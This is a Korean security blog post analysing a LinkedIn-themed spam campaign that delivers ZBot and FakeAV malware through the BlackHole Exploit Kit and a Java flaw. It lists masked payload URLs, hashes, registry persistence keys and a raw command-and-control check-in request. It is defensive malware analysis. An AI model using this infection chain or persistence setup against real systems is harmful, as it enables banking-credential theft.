해외에서 서비스하는 비즈니스 소셜 네트워크 서비스 링크드인(LinkedIn)에서 발송한 초대 메시지로 위장한 스팸(Spam) 메일을 이용하여 사용자가 링크(URL)를 클릭할 경우 Java 취약점을 이용한 제우스봇(ZBot) 악성코드를 감염시키는 사례를 확인하였습니다. 

이메일 제목은 "LInkedin pending messages"으로 되어 있으며, 내용은 Nortel 직원이 초대를 하였다는 내용을 포함한 링크가 3개 포함되어 있는 형태입니다. 

수신된 메일의 링크 속성값을 확인해보면 수상한 링크라는 것을 눈치챌 수 있으며, 일반적으로 이런 방식의 이메일이 온 경우에는 링크 속성값을 반드시 확인하시고 접속을 하는 습관을 가지시기 바랍니다. 

해당 링크를 통해 접속을 시도해보면 다양한 서버로부터 js.js 스크립트 파일을 받아오는 동작을 확인할 수 있습니다.

 

참고로 js.js 파일에 대하여 avast! 보안 제품에서는 JS:Redirector-UE [Trj] (VirusTotal : 6/42) 진단명으로 진단되고 있습니다. 

js.js 스크립트가 연결한 웹 서버에서는 심한 난독화가 이루어진 BlackHole Exploit Kit 악성 스크립트를 통해 Oracle JRE 취약점을 이용하여 자동으로 감염을 유발하는 행위를 진행합니다.

 

참고로 해당 스크립트(MD5 : 82aed7295e29e455ee37efc8c3abd108)에 대하여 알약(ALYac) 보안 제품에서는 Exploit.BlackHoleKit.A 진단명으로 진단됩니다. 

실제 사용자 화면에서는 그림과 같이 "Wait Please, Loading..." 또는 "Please wait page is loading..."와 같은 메시지만 출력되면서 백그라운드 방식으로 감염이 진행됩니다.

  • h**p://50.***.8.***/q.php?e=5&f=f821b → about.exe 파일을 인터넷 임시 폴더에 다운로드 → "C:\Documents and Settings\All Users\Local Settings\Temp\msvirom.bat" 파일로 생성(복제)

생성된 msvirom.bat 파일(MD5 : 56a16e3a62a1fb7eae0e34d5b1044a6c)은 숨김(H), 시스템(S) 속성값을 가지며, 현재 시점에서는 바이러스토탈(VirusTotal) 기준으로 진단되는 백신이 존재하지 않습니다.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\

Explorer\Run
 - 52343 = C:\DOCUME~1\ALLUSE~1\LOCALS~1\Temp\msvirom.bat

특히 해당 파일은 레지스트리 값에 자신을 등록하여 시스템 시작시 자동으로 실행되도록 구성되어 있습니다.

 

추가적으로 다운로드된 0019ac92.exe 파일을 통하여 특정 서버와 연결을 시도하여 다음과 같은 체크를 하는 것을 확인할 수 있습니다.(※ 해당 파일에 대해서는 능력 부족으로 수집에 실패했습니다. )

GET /s.php?0Q9oBPXEN0uECUgzEJ95RQsaiTvvq1aG3F/2q5sb+0TDnXyHyXPv HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)
Host: whatisadebima.com
Cache-Control: no-cache

해당 도메인 서버를 확인해보면 악성 파일 운영자가 설치 관련 정보를 체크하는 웹 서비스가 아닌가 추정됩니다.

  • h**p://lenin***.ru/fas.exe (MD5 : a08e1d64400a2862684421175268747c) - Kaspersky : Trojan-FakeAV.Win32.FakeRecovery.aer (VirusTotal : 4/42)

러시아(Russia)에 등록된 특정 서버로부터 fas.exe 파일을 다운로드하여 "C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\acxTscSLoSuqNt.exe.tmp" 형태로 파일을 생성(복제)합니다.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager
 - PendingFileRenameOperations = \??\C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\acxTscSLoSuqNt.exe.tmp

생성된 acxTscSLoSuqNt.exe.tmp 파일은 숨김(H), 시스템(S) 속성값을 가지며, 자신을 레지스트리 값에 등록합니다.

  • h**p://lenin***.ru/w.exe (MD5 : b9715cc087ce93c0521a707e1da97d4b) - nProtect : Trojan-Spy/W32.ZBot.276576.B (VirusTotal : 19/42)

또 다른 w.exe 파일을 다운로드하여 숨김(H), 시스템(S) 속성값을 가지는 "C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\0019ffe2.exe" 형태로 파일을 생성(복제)합니다.

 

해당 파일(0019ffe2.exe)은 "C:\Documents and Settings\(사용자 계정)\Application Data\Ufqy\opaga.exe" 파일을 생성하여, 다양한 프로세스에 자신을 인젝션(Injection)하는 것으로 보입니다.

 

참고로 opaga.exe (MD5 : 49dfd941a790320edc936b9da9a1cc03) 파일에 대하여 Kaspersky 보안 제품에서는 Trojan-Spy.Win32.Zbot.dshz (VirusTotal : 19/42) 진단명으로 진단되고 있습니다.

 

이를 통해 사용자가 특정 금융권 웹 사이트 접속시 금융 정보 수집을 통해 외부 유출을 시도하며 결과적으로 금전적 피해를 유발할 수 있을 것으로 추정됩니다.

 

제우스봇(ZBot)의 경우 이메일을 통해 첨부 파일 실행 또는 링크(URL)를 클릭하도록 유도하여 취약점을 가지는 소프트웨어를 사용할 경우 자동으로 감염시키는 1회성 공격을 하는 경향이 매우 강합니다.

 

그러므로 해외에서 수신되는 위와 같은 이메일은 호기심에라도 클릭하여 감염되는 일이 없도록 매우 주의하시기 바라며, Oracle JRE 소프트웨어가 설치된 환경은 반드시 최신 버전을 사용하는 습관을 가지시기 바랍니다.

블로그 이미지

울지않는 벌새

울지않는벌새가 되고 싶은 나..